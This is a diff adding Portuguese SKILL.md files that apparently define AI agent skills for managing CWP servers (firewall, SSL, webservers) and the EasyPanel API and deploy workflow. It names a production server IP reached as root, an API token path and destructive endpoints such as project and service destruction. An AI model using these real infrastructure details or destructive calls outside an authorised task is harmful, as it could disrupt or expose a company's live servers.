kernel.panic=10
# Aplicar:
sysctl -p
```
### MySQL Connection Limits
**Ficheiro:** `/etc/my.cnf` ou `/etc/my.cnf.d/server.cnf`
```bash
# Secção [mysqld]:
max_user_connections=45
# Restart:
service mysql restart
```
---
## Anti-Patterns (NUNCA FAZER)
| Anti-Pattern | Risco | Alternativa |
|--------------|-------|-------------|
| Bloquear IP sem verificar | Bloquear cliente | `csf -g IP` primeiro |
| Desactivar firewall | Servidor exposto | Manter sempre activo |
| Editar iptables directamente | Conflito com CSF | Usar comandos CSF |
| Ignorar logs LFD | Não detectar ataques | Monitorizar regularmente |
---
## Validação Pós-Operação
```bash
# 1. Verificar firewall activo
csf -l | head -20
# 2. Verificar IP específico
csf -g IP
# 3. Verificar LFD activo
service lfd status
# 4. Testar conectividade
curl -sI http://localhost | head -5
```
---
## Thresholds de Alerta
| Condição | Acção |
|----------|-------|
| Muitos IPs bloqueados por LFD | Verificar se ataque ou falsos positivos |
| IP legítimo bloqueado | Desbloquear + whitelist |
| Firewall desactivado | Activar imediatamente |
---
## Checklist de Execução
- [ ] Verificar estado actual (`csf -l`)
- [ ] Identificar IP correcto
- [ ] Executar comando apropriado
- [ ] Verificar resultado (`csf -g IP`)
- [ ] Documentar acção tomada
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** wiki.centos-webpanel.com/csf-firewall-command-line

242
infraestrutura/skills/cwp-ssl/SKILL.md Normal file
View File

@@ -0,0 +1,242 @@
---
name: cwp-ssl
description: CWP AutoSSL management using native acme.sh. Manages SSL certificates, renewals, and troubleshooting. Based on official CWP documentation only. Use when user mentions "ssl cwp", "autossl", "certificado ssl", "renovar ssl", "acme.sh".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: null
---
# /cwp-ssl - Gestão SSL CWP (Documentação Oficial)
Gestão de certificados SSL no CWP usando acme.sh nativo. **Zero assumptions, zero hallucinations** - apenas comandos documentados oficialmente.
**REGRA #38 - ZERO INVENCAO:** NUNCA improvisar comandos. Verificar estado actual ANTES de alterar. Pesquisar wiki CWP se necessario. Usar APENAS scripts oficiais.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
---
## Documentação Base
- [AutoSSL CWP Wiki](https://docs.control-webpanel.com/docs/admin-guide/ssl/autossl)
- [acme.sh Documentation](https://wiki.centos-webpanel.com/)
---
## Paths Oficiais (Documentados)
| Path | Descrição |
|------|-----------|
| `/root/.acme.sh/` | Instalação acme.sh |
| `/root/.acme.sh/cwp_certs/` | Certificados CWP |
| `/root/.acme.sh/acme.sh.log` | Log acme.sh |
| `/var/log/cwp/autossl.log` | Log AutoSSL CWP |
| `/usr/local/apache/autossl_tmp/` | **Webroot para validação SSL** |
| `/etc/pki/tls/certs/` | Certificados Nginx |
| `/etc/pki/tls/private/` | Chaves privadas Nginx |
---
## Scripts Oficiais
| Script | Descrição |
|--------|-----------|
| `/scripts/install_acme` | Instala/reinstala acme.sh |
| `/scripts/autossl_reload` | Reload AutoSSL |
| `/scripts/generate_hostname_ssl` | Gera SSL para hostname |
| `/scripts/hostname_ssl_restart_services` | Restart serviços após SSL hostname |
---
## Comandos Documentados
### Verificar Certificados Instalados
```bash
# Listar todos os certificados CWP
ls /root/.acme.sh/cwp_certs/
```
### Verificar Próxima Renovação
```bash
# Ver data de próxima renovação para um domínio
grep "Le_NextRenewTimeStr" /root/.acme.sh/cwp_certs/www.DOMINIO_ecc/www.DOMINIO.conf
```
### Forçar Renovação Manual
```bash
# COMANDO OFICIAL para forçar renovação
/root/.acme.sh/acme.sh --renew -d DOMINIO --force --home /root/.acme.sh/cwp_certs
```
### Verificar Certificado Activo
```bash
# Verificar validade de certificado em produção
echo | openssl s_client -connect DOMINIO:443 2>/dev/null | openssl x509 -noout -dates
```
### Ver Logs de Renovação
```bash
# Log acme.sh
tail -100 /root/.acme.sh/acme.sh.log | grep DOMINIO
# Log AutoSSL CWP
tail -100 /var/log/cwp/autossl.log
```
---
## Cron de Renovação Automática
**Cron CWP (documentado):** `23 2 * * *` - Renovação diária às 02:23
```bash
# Verificar cron de renovação
crontab -l | grep -i acme
```
---
## Workflows
### 1. Listar Todos os Certificados
```bash
for d in $(ls /root/.acme.sh/cwp_certs/); do
echo "=== $d ==="
grep -E 'Le_NextRenewTimeStr|Le_Alt' /root/.acme.sh/cwp_certs/$d/*.conf 2>/dev/null | head -3
done
```
### 2. Verificar Certificados Expirando (<30 dias)
```bash
for d in $(ls /root/.acme.sh/cwp_certs/); do
domain=$(echo $d | sed 's/_ecc$//')
echo "=== $domain ==="
echo | openssl s_client -connect $domain:443 2>/dev/null | openssl x509 -noout -dates
done 2>&1 | grep -A1 "notAfter"
```
### 3. Forçar Renovação de Domínio Específico
```bash
# Substituir DOMINIO pelo domínio real
/root/.acme.sh/acme.sh --renew -d DOMINIO --force --home /root/.acme.sh/cwp_certs
```
### 4. Reinstalar acme.sh (se corrompido)
```bash
# COMANDO OFICIAL
sh /scripts/install_acme
```
### 5. Gerar SSL para Hostname
```bash
# COMANDO OFICIAL
sh /scripts/generate_hostname_ssl
sh /scripts/hostname_ssl_restart_services
```
---
## Troubleshooting Documentado
### Renovação Falha - Muitos Subdomínios
**Problema:** `Le_Alt` contém muitos subdomínios (mail, ftp, cpanel) - qualquer falha bloqueia tudo.
**Solução documentada:**
```bash
# Editar .conf para ter apenas domínio principal
vi /root/.acme.sh/cwp_certs/www.DOMINIO_ecc/www.DOMINIO.conf
# Reduzir Le_Alt para apenas 'DOMINIO'
```
### Webroot Incorrecto
**Problema:** Validação falha porque ficheiro `.well-known/acme-challenge/` não é encontrado.
**Solução documentada:**
```bash
# O Nginx CWP serve validação de pasta GLOBAL, não do site
# Pasta correcta:
/usr/local/apache/autossl_tmp/
# NUNCA usar (não funciona):
/home/user/domain.pt/.well-known/
```
### Ver Erro Específico
```bash
tail -100 /root/.acme.sh/acme.sh.log | grep -E 'error|Error|ERRO'
```
---
## Anti-Patterns (NUNCA FAZER)
| Anti-Pattern | Risco | Alternativa |
|--------------|-------|-------------|
| **Usar certbot** | Conflito com acme.sh nativo | Usar acme.sh CWP |
| Incluir mail/ftp/cpanel em Le_Alt | Falha em cascata | Apenas domínio principal |
| Criar hooks manuais | Sobrescrito em update | Usar scripts oficiais |
| Editar certificados em /etc/pki/ | Sobrescrito | Editar em cwp_certs |
---
## Validação Pós-Operação
Após qualquer operação SSL, validar:
```bash
# 1. Certificado instalado correctamente
echo | openssl s_client -connect DOMINIO:443 2>/dev/null | openssl x509 -noout -subject -dates
# 2. Sem erros no log
tail -20 /root/.acme.sh/acme.sh.log | grep -i error
# 3. Site acessível via HTTPS
curl -sI https://DOMINIO | head -5
```
---
## Thresholds de Alerta
| Condição | Status | Acção |
|----------|--------|-------|
| Expira >30 dias | OK | Nenhuma |
| Expira 15-30 dias | Warning | Monitorizar |
| Expira <15 dias | **Crítico** | Renovar imediatamente |
| Expirado | **Urgente** | Forçar renovação |
---
## Checklist de Execução
- [ ] Verificar domínio existe em cwp_certs
- [ ] Verificar webroot está acessível
- [ ] Executar comando de renovação se necessário
- [ ] Validar certificado após operação
- [ ] Verificar logs sem erros
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** Documentação oficial CWP (docs.control-webpanel.com, wiki.centos-webpanel.com)

259
infraestrutura/skills/cwp-webserver/SKILL.md Normal file
View File

@@ -0,0 +1,259 @@
---
name: cwp-webserver
description: CWP webserver management with official API. Apache, Nginx, rebuild configurations, restart services. Based on official CWP documentation only. Use when user mentions "apache cwp", "nginx cwp", "webserver cwp", "vhost cwp".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: null
---
# /cwp-webserver - WebServers CWP (Documentação Oficial)
Gestão de webservers no CWP. **Zero assumptions, zero hallucinations** - apenas comandos documentados.
**REGRA #38 - ZERO INVENCAO:** NUNCA improvisar comandos. Verificar estado actual ANTES de alterar. Pesquisar wiki CWP se necessario. Usar APENAS scripts oficiais.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
---
## Documentação Base
- [CWP Admin API](https://wiki.centos-webpanel.com/cwp-admin-api)
- [CWP Scripts](https://wiki.centos-webpanel.com/cwp-scripts)
- [WebServers Update](https://wiki.centos-webpanel.com/webservers-update)
---
## API WebServers (Documentada)
### Rebuild Todas as Configurações
```bash
/scripts/cwp_api webservers rebuild_all
```
### Rebuild Configuração de Utilizador
```bash
/scripts/cwp_api webservers rebuild_user USERNAME
```
### Restart WebServers
```bash
/scripts/cwp_api webservers restart
```
### Reload WebServers
```bash
/scripts/cwp_api webservers reload
```
---
## Scripts Oficiais
| Script | Descrição |
|--------|-----------|
| `/scripts/restart_httpd` | Restart Apache |
| `/scripts/cwpsrv_rebuild_user_conf` | Rebuild config de todos os utilizadores |
| `/scripts/varnish_clear_cache` | Limpar cache Varnish |
| `/scripts/apache_mpm_calculator` | Gerar configuração Apache MPM |
---
## Comandos de Gestão
### Restart Apache
```bash
sh /scripts/restart_httpd
```
### Rebuild Configurações de Utilizadores
```bash
sh /scripts/cwpsrv_rebuild_user_conf
```
### Limpar Cache Varnish
```bash
sh /scripts/varnish_clear_cache
```
### Gerar Configuração MPM
```bash
sh /scripts/apache_mpm_calculator
```
---
## Verificações
### Status Apache
```bash
systemctl status httpd --no-pager | head -15
```
### Status Nginx
```bash
systemctl status nginx --no-pager | head -15
```
### Testar Configuração Apache
```bash
httpd -t
```
### Testar Configuração Nginx
```bash
nginx -t
```
### Ver Virtual Hosts
```bash
httpd -S 2>&1 | grep -E 'port|namevhost' | head -20
```
---
## Workflows
### 1. Rebuild Completo (Problema de Configuração)
```bash
# Rebuild todas as configs
/scripts/cwp_api webservers rebuild_all
# Restart
/scripts/cwp_api webservers restart
```
### 2. Rebuild Utilizador Específico
```bash
# Rebuild apenas um utilizador
/scripts/cwp_api webservers rebuild_user USERNAME
# Reload (sem downtime)
/scripts/cwp_api webservers reload
```
### 3. Após Alterações em Site
```bash
# Reload (mais suave)
/scripts/cwp_api webservers reload
```
### 4. Limpar Cache Varnish (Se Activo)
```bash
sh /scripts/varnish_clear_cache
```
### 5. Verificar Antes de Restart
```bash
# Testar configurações primeiro
httpd -t && nginx -t
# Se OK, restart
/scripts/cwp_api webservers restart
```
---
## REGRA FUNDAMENTAL: ZERO INVENCAO (Regra #38)
**NUNCA improvisar comandos para Apache/Varnish/Nginx/PHP no CWP.**
Protocolo obrigatorio ANTES de qualquer accao:
1. **VERIFICAR** estado actual (systemctl status, logs, config activa)
2. **PESQUISAR** skills /cwp-* para comandos oficiais
3. **PESQUISAR** wiki CWP se skill nao cobre o caso
4. **USAR** apenas scripts oficiais CWP (/scripts/*)
5. **NUNCA** inventar comandos, flags, ou configuracoes
Se nao encontra o comando correcto: **PERGUNTAR ao utilizador**, nunca adivinhar.
Exemplos de invencao proibida:
- Editar ficheiros de config Apache directamente em vez de usar rebuild
- Inventar flags para apachectl que nao estao documentadas
- Alterar parametros de sistema (sysctl, somaxconn) sem pesquisar impacto
- Matar processos (kill -9) sem entender o que esta a correr
- Desactivar modulos/servicos sem confirmar dependencias
---
## Anti-Patterns (NUNCA FAZER)
| Anti-Pattern | Risco | Alternativa |
|--------------|-------|-------------|
| Inventar comandos | PHP desactivado, site offline | Pesquisar skills/wiki primeiro |
| Restart sem testar config | Downtime | `httpd -t` primeiro |
| Editar vhosts manualmente | Sobrescrito | Usar CWP ou rebuild |
| Ignorar erros de teste | Site offline | Corrigir antes restart |
| Restart em vez de reload | Downtime | Reload quando possível |
| Alterar sysctl sem pesquisar | Instabilidade | Verificar documentacao |
| kill -9 em processos CWP | Servicos corrompidos | Usar scripts oficiais |
---
## Diferença Restart vs Reload
| Operação | Efeito | Quando Usar |
|----------|--------|-------------|
| **Reload** | Recarrega config sem parar | Alterações pequenas |
| **Restart** | Para e inicia novamente | Alterações grandes, módulos |
---
## Validação Pós-Operação
```bash
# 1. Verificar serviços activos
systemctl is-active httpd nginx
# 2. Testar localhost
curl -sI localhost | head -5
# 3. Testar domínio específico
curl -sI http://DOMINIO | head -5
# 4. Verificar logs de erro
tail -20 /var/log/httpd/error_log
tail -20 /var/log/nginx/error.log
```
---
## Checklist de Execução
- [ ] Testar configuração (`httpd -t`, `nginx -t`)
- [ ] Escolher reload vs restart
- [ ] Executar comando
- [ ] Verificar serviços activos
- [ ] Testar acesso aos sites
- [ ] Verificar logs se problemas
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** wiki.centos-webpanel.com/cwp-admin-api, wiki.centos-webpanel.com/cwp-scripts

578
infraestrutura/skills/easypanel-api/SKILL.md Normal file
View File

@@ -0,0 +1,578 @@
---
name: easypanel-api
description: EasyPanel official tRPC API reference. All endpoints for projects, services, deploy, settings. Use when user mentions "easypanel api", "criar serviço easypanel", "deploy easypanel", "easypanel config".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: 1502
---
# /easypanel-api - API Oficial EasyPanel
Referência completa da API tRPC do EasyPanel. **Baseado em engenharia reversa do SDK oficial.**
---
## Autenticação
```bash
# Token guardado em /etc/easypanel/.api-token (chmod 600)
TOKEN=$(cat /etc/easypanel/.api-token)
# Header obrigatório
-H "Authorization: Bearer $TOKEN"
```
---
## Base URL
```
http://localhost:3000/api/trpc/
```
**Nota:** Usar localhost via SSH, não expor externamente.
---
## Formato de Requests
### GET (leitura)
```bash
curl -s "http://localhost:3000/api/trpc/ENDPOINT?input=URL_ENCODED_JSON" \
-H "Authorization: Bearer $TOKEN"
```
### POST (escrita)
```bash
curl -s -X POST "http://localhost:3000/api/trpc/ENDPOINT" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{...}}'
```
---
## Projects API
### Listar Projectos
```bash
curl -s "http://localhost:3000/api/trpc/projects.listProjects" \
-H "Authorization: Bearer $TOKEN"
```
**Response:**
```json
{
"result": {
"data": {
"json": [
{"name": "descomplicar", "createdAt": "2024-12-30T01:32:45.738Z"},
{"name": "clientes", "createdAt": "2024-12-30T16:18:38.840Z"}
]
}
}
}
```
### Listar Projectos com Serviços
```bash
curl -s "http://localhost:3000/api/trpc/projects.listProjectsAndServices" \
-H "Authorization: Bearer $TOKEN"
```
**Response:** Lista completa de projectos e todos os serviços com configurações.
### Criar Projecto
```bash
curl -s -X POST "http://localhost:3000/api/trpc/projects.createProject" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"name":"novo-projecto"}}'
```
### Destruir Projecto
```bash
curl -s -X POST "http://localhost:3000/api/trpc/projects.destroyProject" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"nome-projecto"}}'
```
### Inspeccionar Projecto
```bash
curl -s "http://localhost:3000/api/trpc/projects.inspectProject?input=%7B%22json%22%3A%7B%22projectName%22%3A%22descomplicar%22%7D%7D" \
-H "Authorization: Bearer $TOKEN"
```
---
## Services API
### Service Types
| Type | Descrição |
|------|-----------|
| `app` | Aplicação (Node.js, Python, Go, etc.) |
| `mysql` | MySQL database |
| `mariadb` | MariaDB database |
| `postgres` | PostgreSQL database |
| `mongo` | MongoDB database |
| `redis` | Redis cache |
### Criar Serviço App
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.createService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"descomplicar","serviceName":"minha-api"}}'
```
### Criar Serviço Database
```bash
# PostgreSQL
curl -s -X POST "http://localhost:3000/api/trpc/services.postgres.createService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"descomplicar","serviceName":"minha-db"}}'
# MySQL
curl -s -X POST "http://localhost:3000/api/trpc/services.mysql.createService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"descomplicar","serviceName":"mysql-db"}}'
# Redis
curl -s -X POST "http://localhost:3000/api/trpc/services.redis.createService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"descomplicar","serviceName":"cache"}}'
```
### Inspeccionar Serviço
```bash
# URL encode: {"json":{"projectName":"descomplicar","serviceName":"dashboard_descomplicar"}}
curl -s "http://localhost:3000/api/trpc/services.app.inspectService?input=%7B%22json%22%3A%7B%22projectName%22%3A%22descomplicar%22%2C%22serviceName%22%3A%22dashboard_descomplicar%22%7D%7D" \
-H "Authorization: Bearer $TOKEN"
```
**Response:**
```json
{
"projectName": "descomplicar",
"name": "dashboard_descomplicar",
"type": "app",
"enabled": true,
"token": "deploy-webhook-token",
"source": {"type": "git", "repo": "https://...", "ref": "main"},
"build": {"type": "nixpacks", "buildCommand": "npm run build"},
"env": "VAR=value",
"mounts": [],
"ports": []
}
```
### Deploy Serviço
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.deployService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"descomplicar","serviceName":"minha-api"}}'
```
### Enable/Disable Serviço
```bash
# Disable
curl -s -X POST "http://localhost:3000/api/trpc/services.app.disableService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"descomplicar","serviceName":"minha-api"}}'
# Enable
curl -s -X POST "http://localhost:3000/api/trpc/services.app.enableService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"descomplicar","serviceName":"minha-api"}}'
```
### Destruir Serviço
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.destroyService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"descomplicar","serviceName":"minha-api"}}'
```
---
## Service Configuration API
### Actualizar Source (GitHub)
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateSourceGithub" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"owner":"ealmeida",
"repo":"MeuRepo",
"ref":"main",
"path":"/"
}}'
```
### Actualizar Source (Git Custom)
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateSourceGit" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"repo":"https://git.descomplicar.pt/org/repo",
"ref":"main",
"path":"/"
}}'
```
### Actualizar Source (Docker Image)
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateSourceImage" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"image":"node:22-alpine"
}}'
```
### Actualizar Environment Variables
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateEnv" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"env":"NODE_ENV=production\nPORT=3000\nDATABASE_URL=postgres://..."
}}'
```
### Actualizar Domains
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateDomains" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"domains":[
{"host":"api.descomplicar.pt","https":true,"port":3000}
]
}}'
```
### Actualizar Mounts
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateMounts" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"mounts":[
{"type":"volume","name":"data","mountPath":"/app/data"}
]
}}'
```
### Actualizar Ports (non-HTTP)
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updatePorts" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"ports":[
{"published":8080,"target":3000,"protocol":"tcp"}
]
}}'
```
### Actualizar Resources
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateResources" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"resources":{
"memoryLimit":"512m",
"memoryReservation":"256m",
"cpuLimit":1,
"cpuReservation":0.5
}
}}'
```
### Actualizar Build Config
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateBuild" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"build":{
"type":"nixpacks",
"buildCommand":"npm run build",
"startCommand":"npm start"
}
}}'
```
### Actualizar Deploy (Replicas, Command)
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.app.updateAdvanced" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-api",
"deploy":{
"replicas":2,
"command":"node dist/index.js",
"zeroDowntime":true
}
}}'
```
---
## Monitor API
### System Stats
```bash
curl -s "http://localhost:3000/api/trpc/monitor.getSystemStats" \
-H "Authorization: Bearer $TOKEN"
```
### Service Stats
```bash
curl -s "http://localhost:3000/api/trpc/monitor.getServiceStats?input=%7B%22json%22%3A%7B%22projectName%22%3A%22descomplicar%22%2C%22serviceName%22%3A%22minha-api%22%7D%7D" \
-H "Authorization: Bearer $TOKEN"
```
### Docker Task Stats
```bash
curl -s "http://localhost:3000/api/trpc/monitor.getDockerTaskStats" \
-H "Authorization: Bearer $TOKEN"
```
---
## Logs API
### Get Service Logs
```bash
curl -s "http://localhost:3000/api/trpc/logs.getServiceLogs?input=%7B%22json%22%3A%7B%22projectName%22%3A%22descomplicar%22%2C%22serviceName%22%3A%22minha-api%22%2C%22tail%22%3A100%7D%7D" \
-H "Authorization: Bearer $TOKEN"
```
---
## Settings API
### Get Server IP
```bash
curl -s "http://localhost:3000/api/trpc/settings.getServerIp" \
-H "Authorization: Bearer $TOKEN"
```
### Get Panel Domain
```bash
curl -s "http://localhost:3000/api/trpc/settings.getPanelDomain" \
-H "Authorization: Bearer $TOKEN"
```
### Set Panel Domain
```bash
curl -s -X POST "http://localhost:3000/api/trpc/settings.setPanelDomain" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"domain":"easy.descomplicar.pt"}}'
```
### Get/Set Let's Encrypt Email
```bash
# Get
curl -s "http://localhost:3000/api/trpc/settings.getLetsEncryptEmail" \
-H "Authorization: Bearer $TOKEN"
# Set
curl -s -X POST "http://localhost:3000/api/trpc/settings.setLetsEncryptEmail" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"email":"emanuel@descomplicar.pt"}}'
```
### Restart Traefik
```bash
curl -s -X POST "http://localhost:3000/api/trpc/settings.restartTraefik" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{}}'
```
### Restart EasyPanel
```bash
curl -s -X POST "http://localhost:3000/api/trpc/settings.restartEasypanel" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{}}'
```
### Prune Docker Images
```bash
curl -s -X POST "http://localhost:3000/api/trpc/settings.pruneDockerImages" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{}}'
```
---
## Database Backup API
### Update Backup Config
```bash
curl -s -X POST "http://localhost:3000/api/trpc/services.postgres.updateBackup" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{
"projectName":"descomplicar",
"serviceName":"minha-db",
"backup":{
"enabled":true,
"schedule":"0 3 * * *",
"destination":{
"type":"s3",
"bucket":"backups",
"region":"eu-west-1",
"accessKey":"...",
"secretKey":"..."
}
}
}}'
```
---
## Helper: URL Encode JSON
Para GET requests, o input deve ser URL encoded:
```bash
# Usando Python
INPUT='{"json":{"projectName":"descomplicar","serviceName":"api"}}'
ENCODED=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$INPUT'))")
curl -s "http://localhost:3000/api/trpc/services.app.inspectService?input=$ENCODED" -H "Authorization: Bearer $TOKEN"
```
---
## Wrapper Script
Criar `/usr/local/bin/easypanel-api`:
```bash
#!/bin/bash
# EasyPanel API wrapper
# Usage: easypanel-api <endpoint> [json-body]
TOKEN=$(cat /etc/easypanel/.api-token)
BASE="http://localhost:3000/api/trpc"
if [ -z "$2" ]; then
# GET request
curl -s "$BASE/$1" -H "Authorization: Bearer $TOKEN"
else
# POST request
curl -s -X POST "$BASE/$1" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d "$2"
fi
```
**Uso:**
```bash
easypanel-api projects.listProjects
easypanel-api services.app.deployService '{"json":{"projectName":"descomplicar","serviceName":"api"}}'
```
---
## Checklist Uso API
```
1. [ ] SSH para servidor easy
2. [ ] TOKEN=$(cat /etc/easypanel/.api-token)
3. [ ] Testar: curl -s "http://localhost:3000/api/trpc/projects.listProjects" -H "Authorization: Bearer $TOKEN"
4. [ ] Usar endpoints conforme documentado
5. [ ] Validar resposta (result.data.json)
```
---
## Anti-Patterns
| Anti-Pattern | Risco | Alternativa |
|--------------|-------|-------------|
| Expor API externamente | Segurança | Usar apenas via SSH localhost |
| Hardcode token | Leak | Usar /etc/easypanel/.api-token |
| Não validar response | Erros silenciosos | Verificar result.data.json |
| POST sem Content-Type | Request falha | Sempre incluir header |
---
**Versão:** 1.0.0 | **Autor:** Descomplicar®
**Fonte:** Engenharia reversa SDK github.com/Easypanel-Community/easypanel

413
infraestrutura/skills/easypanel-deploy/SKILL.md Normal file
View File

@@ -0,0 +1,413 @@
---
name: easypanel-deploy
description: Deploy completo e automatizado para EasyPanel com validação integrada via API oficial.
author: Descomplicar® Crescimento Digital
version: 2.0.0
quality_score: 70
user_invocable: true
desk_task: TBD
allowed-tools: Task
dependencies:
- easypanel-api
---
# EasyPanel Deploy
Deploy completo e automatizado para EasyPanel com validação integrada.
## Quando Usar
- Deploy completo de projecto
- Deploy com validação automática
- Deploy com monitoring
- Deploy com safety net (auto-rollback)
- Production deploys críticos
## Sintaxe
```bash
/easypanel-deploy [--skip-tests] [--force]
```
## Exemplos
```bash
# Deploy normal (com tests e validation)
/easypanel-deploy
# Deploy sem tests (CI/CD já rodou)
/easypanel-deploy --skip-tests
# Force deploy (ignorar warnings)
/easypanel-deploy --force
```
## Workflow Completo (9 Steps)
### 1. Pre-deploy Validation
```bash
/easypanel-validate
```
**Gates:**
- Score < 7/10 → **ABORT** (excepto --force)
- Critical issues → **ABORT**
- Se pass → Continue
### 2. Run Tests (se não --skip-tests)
```bash
npm test
```
**Gates:**
- Tests fail → **ABORT**
- No tests found → **WARNING** (continue)
- Tests pass → Continue
### 3. Build Local (test)
```bash
docker build --no-cache -t <project>:test .
```
**Checks:**
- Build completa sem erros
- Image size < 200MB (Node.js)
- EXPOSE port correcto
**Gates:**
- Build fail → **ABORT**
- Image size > 500MB → **WARNING** (continue com --force)
### 4. Git Check
```bash
git status
```
**Checks:**
- Uncommitted changes?
- Untracked files?
**Actions:**
- Se changes → **PROMPT**: "Commit agora? [y/N]"
- Se yes → `git add . && git commit -m "deploy: ..."`
- Se no → **ABORT**
### 5. Push to Gitea
```bash
git push origin main
```
**Actions:**
- Push commits
- Se CI/CD configurado → Aguardar webhook trigger
- Log commit SHA
### 6. Monitor EasyPanel Deploy
**Via API (preferido - sincroniza com GUI):**
```bash
# Obter token
TOKEN=$(cat /etc/easypanel/.api-token)
# Verificar estado do serviço
curl -s "http://localhost:3000/api/trpc/services.app.inspectService?input=$(echo -n '{"json":{"projectName":"PROJECT","serviceName":"SERVICE"}}' | jq -sRr @uri)" \
-H "Authorization: Bearer $TOKEN"
# Listar todos os serviços do projecto
curl -s "http://localhost:3000/api/trpc/projects.inspectProject?input=$(echo -n '{"json":{"projectName":"PROJECT"}}' | jq -sRr @uri)" \
-H "Authorization: Bearer $TOKEN"
```
**Via SSH (fallback):**
```bash
# Poll cada 10s (timeout 5min)
docker service ls | grep <service>
docker service ps <service>
```
**Timeline:**
- [00:00] Build started
- [01:30] Build complete
- [02:00] Container starting
- [02:15] Health check iniciado
### 7. Health Check (retry 5x, interval 10s)
```bash
curl -f https://<domain>/health
```
**Retry Logic:**
- Tentativa 1-5: aguardar 10s entre cada
- Se 200 OK → **SUCCESS**
- Se 5xx após 5 retries → **ROLLBACK**
- Se timeout → **ROLLBACK**
### 8. Metrics Validation
```bash
# Via docker stats ou EasyPanel API
docker stats <container> --no-stream
```
**Checks:**
- CPU < 80% (avg 60s)
- Memory < 80% limit
- No errors em logs (últimos 60s)
**Gates:**
- CPU > 90% → **WARNING** (potential issue)
- Memory > 90% → **WARNING** (OOM risk)
- Errors em logs → **WARNING** + report
### 9. Success Report
**Output:**
- Total deploy time
- Build time
- Image size
- Health status
- Metrics snapshot
- URLs (production, health, logs)
## Output Format (Success)
```
🚀 EasyPanel Deploy: <project-name>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⏱️ TIMELINE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[00:00] ✅ Pre-deploy validation (score: 9.2/10)
[00:15] ✅ Tests passed (12/12, 2.3s)
[00:20] ✅ Local build (82MB, 1m 34s)
